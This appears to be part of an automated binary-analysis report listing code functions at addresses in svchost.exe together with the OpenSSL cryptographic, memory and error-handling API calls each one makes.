Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,53_2_00007FFDA338CB30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,53_2_00007FFDA334C9A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,53_2_00007FFDA333E9C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33949C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA33949C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,53_2_00007FFDA336E960
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3344A20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3396A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3396A30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A69E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,53_2_00007FFDA33A69E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33349F0 CRYPTO_memdup,CRYPTO_free,53_2_00007FFDA33349F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33668B0 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA33668B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,53_2_00007FFDA334A8B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AA8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33AA8B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3322860 CRYPTO_zalloc,InitializeCriticalSection,53_2_00007FFDA3322860
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332E880 CRYPTO_THREAD_run_once,53_2_00007FFDA332E880
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3392880 CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3392880
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AC890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,53_2_00007FFDA33AC890
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3392930 CRYPTO_realloc,53_2_00007FFDA3392930
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3322940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,53_2_00007FFDA3322940
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337A940 CRYPTO_zalloc,53_2_00007FFDA337A940
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,53_2_00007FFDA336A910
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3382FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA3382FA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,53_2_00007FFDA338EFA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3326FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,53_2_00007FFDA3326FC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A8FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA33A8FD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3372F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,53_2_00007FFDA3372F60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3396F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3396F60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,53_2_00007FFDA3321030
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3345040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3345040
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,53_2_00007FFDA3373040
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA338B040
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335050 CRYPTO_set_ex_data,53_2_00007FFDA3335050
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338AFE0 CRYPTO_free,53_2_00007FFDA338AFE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336CFF0 CRYPTO_realloc,53_2_00007FFDA336CFF0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3341000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3341000
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA332D010
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337EED0 CRYPTO_malloc,CRYPTO_free,53_2_00007FFDA337EED0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA334CED0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3324E80 CRYPTO_free,53_2_00007FFDA3324E80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3340EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3340EF0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3372F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,53_2_00007FFDA3372F00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332EDB0 CRYPTO_THREAD_run_once,53_2_00007FFDA332EDB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3372DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,53_2_00007FFDA3372DB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333CDC0 CRYPTO_malloc,CRYPTO_clear_free,53_2_00007FFDA333CDC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA337EDD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A0D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A0D80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,53_2_00007FFDA3344CB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3394CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3394CC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,53_2_00007FFDA332ECD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3328C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,53_2_00007FFDA3328C60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3322C60 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA3322C60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33ACC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33ACC60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3354D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,53_2_00007FFDA3354D30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,53_2_00007FFDA337ED00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,53_2_00007FFDA334CD10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33213A0 CRYPTO_free,53_2_00007FFDA33213A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33993A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,53_2_00007FFDA33993A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A5360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA33A5360
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,53_2_00007FFDA339B370
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373380 CRYPTO_free,53_2_00007FFDA3373380
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B420 CRYPTO_free,53_2_00007FFDA338B420
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3391430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,53_2_00007FFDA3391430
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,53_2_00007FFDA334D440
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A92A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33A92A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33432C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,53_2_00007FFDA33432C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335B2D0 CRYPTO_free,53_2_00007FFDA335B2D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336F290 CRYPTO_realloc,53_2_00007FFDA336F290
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33492F0 CRYPTO_realloc,memcpy,53_2_00007FFDA33492F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA334D310
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33751D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,53_2_00007FFDA33751D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3375190 BIO_free,CRYPTO_free,53_2_00007FFDA3375190
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,53_2_00007FFDA332321D
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3363220 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA3363220
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3325240 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA3325240
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33551E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,53_2_00007FFDA33551E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,53_2_00007FFDA3373200
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3341210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,53_2_00007FFDA3341210
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,53_2_00007FFDA332B0B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33550D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,53_2_00007FFDA33550D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,53_2_00007FFDA3335070
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A1090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A1090
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3339120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,53_2_00007FFDA3339120
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3371127 CRYPTO_realloc,53_2_00007FFDA3371127
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334D140 CRYPTO_free,CRYPTO_malloc,53_2_00007FFDA334D140
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,53_2_00007FFDA339B140
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33910E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33910E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,53_2_00007FFDA337F0F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335D100 CRYPTO_free,53_2_00007FFDA335D100
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3395760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3395760
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,53_2_00007FFDA3335780
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3333820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,53_2_00007FFDA3333820
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3343840
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,53_2_00007FFDA3335840
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,53_2_00007FFDA3329850
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33916B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA33916B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33236C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,53_2_00007FFDA33236C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33876D0 CRYPTO_free,53_2_00007FFDA33876D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33736D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33736D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33556D0 CRYPTO_zalloc,53_2_00007FFDA33556D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321740 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA3321740
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,53_2_00007FFDA339B6E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3333700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3333700
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33895A0 CRYPTO_free,53_2_00007FFDA33895A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33475B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,53_2_00007FFDA33475B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33235C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,53_2_00007FFDA33235C8
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33215D0 CRYPTO_free,53_2_00007FFDA33215D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33775D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33775D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329590 CRYPTO_free,CRYPTO_memdup,53_2_00007FFDA3329590
